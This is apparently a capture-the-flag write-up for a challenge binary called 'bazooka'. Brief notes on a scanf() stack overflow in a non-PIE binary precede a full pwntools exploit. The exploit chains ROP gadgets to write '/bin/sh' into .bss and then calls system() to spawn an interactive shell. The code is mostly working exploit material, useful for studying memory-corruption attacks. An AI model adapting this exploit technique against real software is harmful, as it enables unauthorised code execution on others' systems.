bazooka

Binary

bazooka

Notes

  • Stack-based buffer overflow (BoF) through an unbounded scanf() read in vuln().
  • No PIE: the binary is mapped at a fixed base, so gadget and function addresses in its text segment are static across runs.
  • Tried to locate a "/bin/sh" string in libc via a libc leak, but that did not pan out.
  • Instead, the writable .bss segment can serve as a scratch area ("code cave") to store the "/bin/sh" string ourselves.
BoF
.bss scratch address used for the string: 0x00601068 (writable, and fixed because the binary is not PIE)
  1. Control PC using BOF
  2. Build a ROP chain that calls scanf() to write "/bin/sh" into the unused .bss area, then returns into vuln() to get a second overflow.
  3. Build a second ROP chain: pop rdi ← address of the "/bin/sh" string in .bss, then return into system() as it appears in the binary.

POC

from pwn import *
from Crypto.Util.number import long_to_bytes
from dataclasses import dataclass

class ROPGAD:
    """ROP gadget addresses for the target, pre-packed as 64-bit little-endian QWORDs.

    The binary is not PIE (see the notes above), so these text-segment
    addresses are fixed across runs. The gadget semantics noted below are
    taken from the attribute names; re-check them against the disassembly
    before reusing this class on a rebuilt binary.
    """

    # pop rdi ; ret — loads the first argument (rdi) for the system() call
    POP_RDI = p64(0x00000000004008F3)
    # lone ret — padding word placed before calls (presumably to keep rsp 16-byte aligned)
    RET = p64(0x0000000000400596)
    # pop rsi ; pop r15 ; ret — loads scanf()'s destination pointer; r15 receives junk
    POP_RSI_POP_R15 = p64(0x4008F1)
    # pop rax ; ... — defined but not referenced by any chain in this script
    POP_RAX_CLUB_RDI = p64(0x400819)

def send_secret_msg(secret_msg: bytes):
    """Wait for the 'message:' prompt on the tube and answer it with *secret_msg*.

    Note: the caller in this script passes a plain str; pwntools is relied on
    to encode it before writing to the process.
    """
    prompt = 'message:'
    io.sendlineafter(prompt, secret_msg)

def send_vuln_msg(vuln_msg: bytes):
    """Wait for the 'Message: ' prompt and send *vuln_msg* — this is the overflowable read."""
    prompt = 'Message: '
    io.sendlineafter(prompt, vuln_msg)

def send_junk_msg(junk_msg: bytes):
    """Wait for the 'junk: ' prompt and send *junk_msg*. Not used by the current exploit path."""
    prompt = 'junk: '
    io.sendlineafter(prompt, junk_msg)


def create_scanf_rop(target_addr: int, ret_addr: int) -> bytes:
    """Build a ROP chain that re-enters the binary's scanf() call with rsi = *target_addr*.

    Chain layout, one QWORD each:
      pop rsi ; pop r15 ; ret -> rsi = target_addr, r15 = 8 bytes of junk
      ret                     -> padding (presumably to realign rsp before the call)
      0x40077e                -> location in the binary that invokes scanf(); rdi (the
                                 format string) is assumed to be set up by the code at
                                 that address — confirm in the disassembly
      ret_addr                -> where execution continues once scanf() returns

    The next line the attacker sends on stdin is what scanf() then stores at
    *target_addr* (see write_code_cave).

    Caveat: this chain is itself delivered through the vulnerable scanf() read.
    If that read uses a "%s"-style conversion, any whitespace byte (0x09-0x0d,
    0x20) inside the packed QWORDs truncates the payload; the addresses used
    here contain none, but re-check after changing any of them.
    """
    SCANF_CALL = p64(0x40077e)
    junk_for_r15 = b'A' * 8

    return b''.join([
        ROPGAD.POP_RSI_POP_R15,
        p64(target_addr),
        junk_for_r15,
        ROPGAD.RET,
        SCANF_CALL,
        p64(ret_addr),
    ])



def control_pc(rop_chain: bytes):
    """Trigger the vuln() overflow so that *rop_chain* overwrites the saved return address.

    The 120-byte filler is the author-measured distance from the start of the
    vulnerable buffer to the saved return address (presumably including the
    saved rbp). The fixed "secret" answers the prompt that precedes the
    overflowable read; it looks like a gate the binary checks first.
    """
    OVERWRITE_LEN = 120
    filler = b'A' * OVERWRITE_LEN

    # First prompt: the expected secret. Second prompt: the overflow itself.
    send_secret_msg("#!@{try_hard3r}")
    send_vuln_msg(filler + rop_chain)


def write_code_cave(code_cave_addr: int, msg: str, ret_addr: int):
    """Store *msg* at *code_cave_addr* via the hijacked scanf(), then continue at *ret_addr*.

    *msg* is sent as the next stdin line once the chain is executing, so it is
    consumed by scanf() rather than by the program's normal prompt. For a
    "%s"-style scanf() this means *msg* must not contain whitespace, and it
    will be NUL-terminated in memory — which is what system("/bin/sh") needs.
    """
    chain = create_scanf_rop(code_cave_addr, ret_addr)
    control_pc(chain)
    # Input for the re-entered scanf(); lands at code_cave_addr.
    io.sendline(msg)

def create_system_sh(binsh_addr):
    """Build a ROP chain that calls system() with rdi = *binsh_addr*.

    *binsh_addr* must point at a NUL-terminated "/bin/sh" string (here the
    .bss cave filled by write_code_cave). 0x4005c0 is system() as reachable
    from the binary itself (likely its PLT stub — verify).
    """
    SYSTEM_CALL = p64(0x4005c0)

    return b''.join([
        ROPGAD.POP_RDI,
        p64(binsh_addr),
        ROPGAD.RET,      # padding before the call; commonly needed so system() sees an aligned rsp
        SYSTEM_CALL,
    ])



def main():
    """Two-stage exploit: plant "/bin/sh" in .bss, then overflow again to call system() on it."""
    VULN_ENTRY = 0x4006f7   # re-entry point into vuln() so we get a second overflow
    BINSH_CAVE = 0x601068   # unused, writable .bss slot (fixed address: binary is no-PIE)

    # Stage 1: hijack scanf() to write the string into .bss, then land back in vuln().
    write_code_cave(BINSH_CAVE, '/bin/sh', VULN_ENTRY)

    # Stage 2: pop rdi = &"/bin/sh" ; system().
    control_pc(create_system_sh(BINSH_CAVE))

    io.interactive()

if __name__ == '__main__':
    # Spawn the local target. `io` is a module-level global read by the send_* helpers.
    io = process('pwn_bazooka_bazooka')

    # Dump every byte crossing the tube; tmux split is where pwntools opens a terminal if asked.
    context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'])

    main()
